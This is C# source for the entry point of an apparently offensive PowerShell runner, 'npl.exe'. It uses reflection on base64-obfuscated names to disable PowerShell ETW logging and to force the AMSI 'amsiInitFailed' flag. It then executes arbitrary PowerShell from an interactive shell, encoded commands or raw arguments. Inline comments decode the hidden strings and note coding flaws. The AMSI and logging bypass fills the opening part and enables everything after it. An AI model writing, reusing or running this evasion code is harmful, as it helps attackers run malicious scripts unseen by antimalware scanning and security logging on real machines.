        static void Main(string[] args)
        {
            // Single shared instance for every branch; not disposed.
            PowerShell ps = PowerShell.Create();

            // Disable Logging
            // Base64 UTF-16LE: the type name is "System.Management.Automation.Tracing.PSEtwLogProvider".
            String myType  = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFQAcgBhAGMAaQBuAGcALgBQAFMARQB0AHcATABvAGcAUAByAG8AdgBpAGQAZQByAA=="));
            // Field name "etwProvider".
            String myField = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("ZQB0AHcAUAByAG8AdgBpAGQAZQByAA=="));
            var    x       = ps.GetType().Assembly.GetType(myType);

            if (x != null)
            {
                // y is not null-checked before SetValue.
                var y = x.GetField(myField, BindingFlags.NonPublic | BindingFlags.Static);
                // Provider keyed by a random GUID replaces the one the tracing class writes through.
                var z = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                y.SetValue(null, z);
            }

            // Disable AMSI
            // Same locals reused: type "System.Management.Automation.AmsiUtils", field "amsiInitFailed".
            myType  = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA=="));
            myField = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=="));
            x       = ps.GetType().Assembly.GetType(myType);
            if (x != null)
            {
                // Marks AMSI initialization as failed for this process; GetField not null-checked.
                x.GetField(myField, BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true);
            }

            if (args.Length >= 1)
            {
                // Culture-sensitive lower-casing for an option switch; ordinal ignore-case would be safer.
                if (args[0].ToLower() == "-encode")
                {
                    if (args.Length == 2)
                    {
                        // UTF-16LE bytes, the encoding PowerShell's -EncodedCommand expects.
                        Byte[] bytes = System.Text.Encoding.Unicode.GetBytes(args[1]);
                        Console.WriteLine(System.Convert.ToBase64String(bytes));
                    }
                    else
                    {
                        Console.WriteLine("usage: npl.exe -encode \"& commands; separated; by; semicolons;\"");
                    }
                }
                else if (args[0].ToLower() == "-decode")
                {
                    if (args.Length == 2)
                    {
                        // FormatException propagates if args[1] is not valid base64.
                        String cmd = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(args[1]));
                        Console.WriteLine(cmd);
                    }
                    else
                    {
                        Console.WriteLine("usage: npl.exe -decode {base_64_string}");
                    }
                }
                else if (args[0].ToLower() == "-shell")
                {
                    // In-memory history handed to TabableReadLine; never persisted.
                    List <string> history = new List <string>();

                    while (true)
                    {
                        // Prompt is rebuilt from the live working directory each iteration.
                        // Invoke()[0] assumes "pwd" produced at least one object.
                        ps.AddScript("pwd");
                        string pwd    = ps.Invoke()[0].ToString();
                        string prompt = "PS " + pwd + "> ";

                        string input = TabableReadLine(ps, prompt, pwd, history);

                        // Skips the Commands.Clear below, leaving "pwd" queued.
                        if (string.IsNullOrEmpty(input))
                        {
                            continue;
                        }

                        if (input.ToLower() == "exit")
                        {
                            break;
                        }

                        history.Add(input);

                        // Sibling helper (not shown); ps.Commands still holds "pwd" at this point.
                        Invoke(ps, input);
                        ps.Commands.Clear();
                    }
                }
                else
                {
                    if (args[0].ToLower() == "-encodedcommand" || args[0].ToLower() == "-enc")
                    {
                        // Every argument after the switch is base64 UTF-16LE; decoded pieces are concatenated directly.
                        String script = "";
                        for (int argidx = 1; argidx < args.Length; argidx++)
                        {
                            script += System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(args[argidx]));
                        }
                        Invoke(ps, script);
                    }
                    else
                    {
                        // Raw arguments joined with NO separator: the '@' is only a verbatim-identifier
                        // prefix and has no effect on the value.
                        String script = "";
                        for (int argidx = 0; argidx < args.Length; argidx++)
                        {
                            script += @args[argidx];
                        }
                        Invoke(ps, script);
                    }
                }
            }
            else
            {
                Console.WriteLine("\r\nusage:\r\nnpl.exe -shell\r\nnpl.exe \"{powershell single command}\"\r\nnpl.exe \"& {commands; semi-colon; separated}\"\r\nnpl.exe -encodedcommand {base64_encoded_command}\r\nnpl.exe -encode \"commands to encode to base64\"\r\nnpl.exe -decode {base64_encoded_command}");
            }
        }